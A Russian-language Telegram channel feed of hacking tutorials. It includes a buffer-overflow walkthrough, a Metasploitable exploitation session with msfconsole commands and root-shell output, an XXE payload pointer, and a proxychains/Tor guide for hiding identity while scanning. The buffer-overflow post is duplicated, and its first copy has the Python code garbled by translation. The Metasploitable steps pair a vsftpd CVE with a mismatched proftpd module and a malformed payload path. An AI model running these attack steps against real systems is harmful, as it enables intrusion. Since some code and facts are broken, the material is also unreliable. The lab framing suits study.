Kali Linux
53.3K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🖥 Linux-Privilege-Escalation-MindMap

Повышение привилегий в Linux. Отличная MindMap и годный полезный материал.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥53
🔍 Как можно взломать что-либо не зная языков программирования?

На самом деле эта тема очень интересная.

Взлом чего-то это очень часто манипуляция с данными на каком-то языке, однако если вы понимаете общую структуру иерархии этих данных то вам может быть намного проще.

Пример. Представим что мы используем XXE уязвимость. Я знаю, что вы скорее всего про нее знаете, поэтому сейчас объясню что это. Если в вкратце и простым языком, то это ошибка в следствие которой, можно вытянуть или даже получить удаленный доступ, или RCE с помощью неправильной фильтрации языка разметки (xml) на сервере.

Однако если вы знаете как взаимодействовать с этой ошибкой, можно использовать определенный готовый код, если у вас есть информация что он делает.

На GitHub'е есть полезные нагрузки для всех уязвимостей. Это очень облегчает работу с "кодом". Если вы ленивый но хитрый вы можете не учить язык программирования а просто взять какой-то готовый вариант. Но самое главное не делать ничего плохого. Ибо помните, что если наделаете делов то вас найдут.

Вот ссылка на раздел - https://github.com/swisskyrepo/PayloadsAllTheThings/

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍251🥰1
Выпуск дистрибутива для исследования безопасности Kali Linux 2023.1

- Предложена новая специализированная сборка Kali Purple (3.4 ГБ), включающая подборку платформ и инструментариев для организации защиты от атак.
- Обновлена тема оформления и загрузочная заставка.
- Пользовательские окружения обновлены до Xfce 4.18 и KDE Plasma 5.27.
- В настройках ядра отключено ограничение доступа к привилегированным сетевым портам (для прикрепления к портам с номерами до 1024 больше не нужен root). Сняты ограничения на запуск dmesg.
И другие изменения.

https://www.kali.org/blog/kali-linux-2023-1-release/

@linuxkalii
👍114🔥3
🎚️ Новая версия ChatGPT теперь в Telegram!

Для всех, кто еще не попробовал новую модель GPT4, рекомендуем бота абсолютно бесплатно.

Поможет написать код, диплом, придумает шутку и станет незаменимым помощником в любых задачах!

Бот: @Chatgpturbobot
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬73👍2👎2🔥1
Как делается перезапись буфера.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()

Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍162👎2🔥1
⚜️ Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

💣Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)


И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍257🔥6
Основы работы с proxychains.

Это очень полезное программное обеспечение, которое я буквально недавно открыл для себя.

Proxychains - программное обеспечение, которое позволяет нам проводить проксимизацию то есть использовать множественное количество прокси серверов для анонимности. Это может помочь нам скрыть свой реальный ip адрес и остаться неизвестным для тех кто захочет нас найти!

#Дисклеймер
Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#Установка
Если у Вас нету proxychains, то вы можете его установить:
sudo apt install proxychains

#Находим конфиг
Теперь настроим конфиг для работы. Поэтому пишем команду для того чтобы его найти.
locate proxycains
Первый конфиг который вы увидите будет тем, что мы ищем.

#Редактируем конфиг для корректной работы
Смело идем туда чтобы исправить что все что надо, используя любой редактор текста. Знаю что все используют Vim но я всегда пользуюсь Nano.

Sudo nano /etc/proxychains4.conf

Вам надо будет убрать знак # перед dynamic_cahin и перед proxy_dns.
В первом случае если вы не уберете решетку, то proxychains просто не будет работать.

Во втором случае proxy_dns позволит Вам проксировать ваш DNS запрос. Так как, если вы этого не сделаете, то DNS останется вашим и Вас будет элементарно вычислить не смотря на смену IP адреса.

Смысл состоит в том, чтобы добавить прокси серверы в самом конце как и написано в примере. Сначала вид протокол потом IP адрес потом порт. И если есть логин и пароль то их тоже следует добавить.

#Добавляем конечным узлом наш прокси
Однако, если вы хотите анонимно просканировать сервер с помощью nmap то лучше всего включить проксирование через TOR, но тут есть момент, что возможно, мы столкнемся с ситуацией, когда сканирование не удастся, потому что конечные точки Tor заблокированы. Поэтому добавляем туда в конец обычный прокси сервер. Чтобы Сначала траффик шел от нас по серверам тор и проходил через наш новый прокси.

#Включаем TOR

Вклюючить проксирование через TOR можно написав в конце конфига и предварительно включить TOR:
sudo service tor start

В самом конфиге в конце пишем:

socks4 127.0.0.1 9050
socks5 127.0.0.1 9050


И последним может быть ваш прокси сервер после этих двух строчек. Такие дела.

@linuxkalii
👍22🔥42😁1
✔️ Что такое XSS на основе dom.

Что такое DOM?
DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».

@linuxkalii
👍124🔥3
⚜️ Anti keystroke deanonymization tool

kloak — инструмент обеспечения приватности, который снизит эффективность сбора биометрических данных нажатия клавиш

Делается путем скрытия временных интервалов между событиями нажатия и отпускания клавиш, которые используются для идентификации и деанонимизации

Вы можете запустить kloak как самостоятельное приложение или как службу GNU/Linux

🖥 Github

#linux

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍163🔥2
💣Коротко о перезаписи буфера💣

Рассмотрим как делается перезапись буфера.
Давайте приступим к практике.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

for x in range (1, 256):
print ("\x" + "{:02x}".format (x), end=")



Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍184🔥2
👣 Bot Aquarium

Проект на Go для работы с Linux-контейнерами,кль управляемые искусственным интеллектом.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍6👎1🔥1
💣Изменение и модификация трафика Ч.1💣

Изменение и модификация трафика является очень важной частью Пентестинга в целом. Давайте рассмотрим с помощью чего можно производить такие манипуляции.

Burp Suite - очень важное программное обеспечение. Именно с помощью него можно пытаться эксплуатировать большое количество уязвимостей. Это П.О предоставляет возможность перехватывать траффик и изменять его, изменяя GET и POST запросы. Таким образом - это дает нам огромное количество возможностей, которыми мы можем воспользоваться.

У Burp Suite есть коммерческая версия но нам будет достаточно использование бесплатной.

У данного фрэймворка есть несколько важных функций, которыми нужно уметь пользоваться:

Прокси-сервер: самый известный аспект Burp Suite, Burp Proxy позволяет нам перехватывать и изменять запросы / ответы при взаимодействии с веб-приложениями.

Repeater: вторая наиболее известная функция Burp - Repeater - позволяет нам захватывать, изменять, а затем повторно отправлять один и тот же запрос несколько раз. Эта функция может быть абсолютно бесценна, особенно , когда мы должны выработать полезную нагрузку путем проб и ошибок для SQL инъекции.

Intruder: Данная функция помогает нам "брутфорсить" разные полезные нагрузки в то место куда нам потребуется.

Декодер: Хотя менее , чем используемый ранее упомянутые функции, декодер все еще обеспечивает ценную услугу при преобразовании данных - либо с точкой зрения декодирования собранной информации, или кодирующей полезной нагрузкой перед отправкой его на цель.

Comparer: Как следует из названия, Comparer позволяет нам сравнивать две части данных на уровне слова или байта. Опять же, это не является чем-то уникальным для Burp Suite, но возможность отправлять (потенциально очень большие) фрагменты данных непосредственно в инструмент сравнения с помощью одного сочетания клавиш может значительно ускорить процесс.

Sequencer: мы обычно используем Sequencer при оценке случайности токенов, таких как значения файлов cookie сеанса или другие предположительно сгенерированные случайным образом данные. Если алгоритм не генерирует безопасные случайные значения, это может открыть некоторые разрушительные возможности для атаки.

@linuxkalii
🔥134👍4
Kali Linux
💣Изменение и модификация трафика Ч.1💣 Изменение и модификация трафика является очень важной частью Пентестинга в целом. Давайте рассмотрим с помощью чего можно производить такие манипуляции. Burp Suite - очень важное программное обеспечение. Именно с помощью…
​​💣Изменение и модификация трафика Ч.2💣

В прошлом посте Вы узнали об основах работы с таким фреймворком как Burp Suite. Сегодня продолжим говорить на эту тему и постараемся закончить серию постов про это программное обеспечение.

Для того чтобы работать с HTTPS траффиком вам надо будет установить сертификат Burp Suite в ваш браузер. Делается это достаточно просто. Для установки надо зайти в ваш фреймворк и скачать его оттуда. После импортировать в браузер. Желательно использовать Mozilla Firefox.

Для того, чтобы было удобней настраивать свои прокси на которых работает Burp вам следует установить Foxy Proxy. С помощью этого П.О вы сможете не заходить в настройки прокси Вашего браузера для того чтобы отключить "проксирование" для Burp. Теперь это можно будет делать в один клик.

Имеет смысл понять как проводить SQL инъекции и XSS атаки а так-же обзавестись огромным количество полезных нагрузок на любой случай жизни, которые вы сможете выпускать как торпеды. Но только разумеется на CTF или если вы работаете в секторе информационной безопасности!

Подумайте про порты. Обычно такое программное обеспечение как Burp Suite стоит на портах по типу 8080 и тд. Вспомните что от настройки портов зависит ваша дальнейшая работоспособность, так как если вы где-то "протупите" то ничего работать не будет. Помните что все остальное П.О можно разместить на 8081 8082 и так далее портах.

@linuxkalii
👍7🔥32
👁‍🗨5 Советов начинающему пентестеру?👁‍🗨

🐍Огромное количество молодых людей которым интересна данная тема, не знают с чего начать и как подступиться. Сегодня я предоставлю 5 советов, которые должны вам помочь.

1. Выберите правильный обучающий ресурс. На данный момент в интернете как минимум две платформы которые помогут Вам научится хакингу. Это Tryhackme и hackthebox.

2. Как и любая другая отрасль пентестинг требует вашего времени. Тратьте его с умом. Имеет смысл отдавать все свободное время. Но если вы перестанете спать и будете только этим заниматься ваш КПД точно упадет. Знаю по себе.

3. Не слушайте специалистов по безопасности которые говорят что сейчас все атаки проводятся с помощью фишинга. Это полный бред. Такие люди по каким-то причинам хотят сбить вас с пути.

4. Всегда просите о помощи если чего-то не понимаете. Иначе будете застревать на одном моменте на несколько суток. А может быть и на неделю. Помощь - это ок!

5. Старайтесь больше практиковаться. Таким образом, вы заметите успех.

Так же хочу сказать, что зачастую у всех CTF есть свой уровень сложности. Опираясь на это, Вам следует начать с самого простого, предварительно выучив много много теории.

Вы всегда можете найти комьюнити которое может Вам помочь, достаточно задать вопрос на StuckOverflow или же в it чатах в телеграме. Помните что вы не один и все получится.

@linuxkalii
👍326🔥5
Если в директории есть файлы fileA, fileB, fileAB, fileBC и fileABC, какие из них подпадут под шаблон file[ABC]?
Anonymous Quiz
17%
fileA, fileB и fileABC
42%
fileABC
17%
fileA и fileB
24%
fileAB, fileBC и fileABC
👍14🔥63👏3😁1
🖥 NoSQLMap — Автоматизированный инструмент для баз данных NoSQL, предназначенный для аудита, а также для автоматизации атак путем внедрения и использования слабых сторон конфигурации по умолчанию в базах данных NoSQL и веб-приложениях, использующих NoSQL, для раскрытия или клонирования данных из базы данных.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥63👎1
Какая зарезервированная переменная используется для вывода общего количества параметров, переданных скрипту?
Anonymous Quiz
16%
$0
35%
$#
32%
$*
18%
$?
😁86👍5🔥4
💨 sniffer

Сниффер сетевого трафика, работающий в терминале, и предназначен для устранения неполадок в сети.

Его можно запускать в любое время для анализа процессов или соединений, вызывающих увеличение сетевого трафика, без загрузки каких-либо модулей ядра.

$ sudo apt-get install libpcap-dev

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥63🤔1
⚜️ ZAP Сканнер уязвимостей

Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.

#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.


Почему бы мне не использовать Burp Suite?

Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.

#Преимущества OWASP ZAP?

Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.


#Установка

OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.

Скачайте и установите с официального сайта: https://www.zaproxy.org/download/

#Автоматичесское сканирование

Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.

ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.

#Ручное сканирование

Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.

На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥64
👁‍🗨DNS в деталях

Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.

Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.

Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.

1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.

Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.

Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов

@linuxkalii
👍18🔥31👎1
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки

Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер


⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍82